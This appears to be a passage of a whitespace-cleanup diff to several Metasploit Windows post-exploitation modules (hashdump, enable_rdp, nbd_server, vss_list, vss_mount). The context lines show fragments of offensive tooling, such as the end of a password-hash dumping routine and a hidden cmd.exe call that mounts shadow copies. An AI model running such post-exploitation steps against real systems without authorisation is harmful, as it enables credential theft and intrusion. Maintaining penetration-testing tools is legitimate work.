a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -272,4 +272,3 @@ class Metasploit3 < Msf::Post d1o + d2o end end - diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index e3133ed664..9a55f0148a 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Post end def run - + if datastore['ENABLE'] or (datastore['USERNAME'] and datastore['PASSWORD']) cleanup_rc = store_loot("host.windows.cleanup.enable_rdp", "text/plain", session,"" , "enable_rdp_cleanup.rc", "enable_rdp cleanup resource file") diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index faa0744b8e..ca24966f06 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -101,4 +101,3 @@ class Metasploit3 < Msf::Post client.railgun.kernel32.CloseHandle(handle) end end - diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 51914008ce..daf56fb566 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post unless start_vss return end - + list = "" shadow_copies = vss_list unless shadow_copies.empty? @@ -78,6 +78,4 @@ class Metasploit3 < Msf::Post end end - - end diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index b8e0b23f58..d0f8165169 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -59,11 +59,9 @@ class Metasploit3 < Msf::Post unless start_vss return end - + r = session.sys.process.execute("cmd.exe /C mklink /D #{datastore['DEVICE']} #{datastore['PATH']}", nil, {'Hidden' => true}) - + end - - end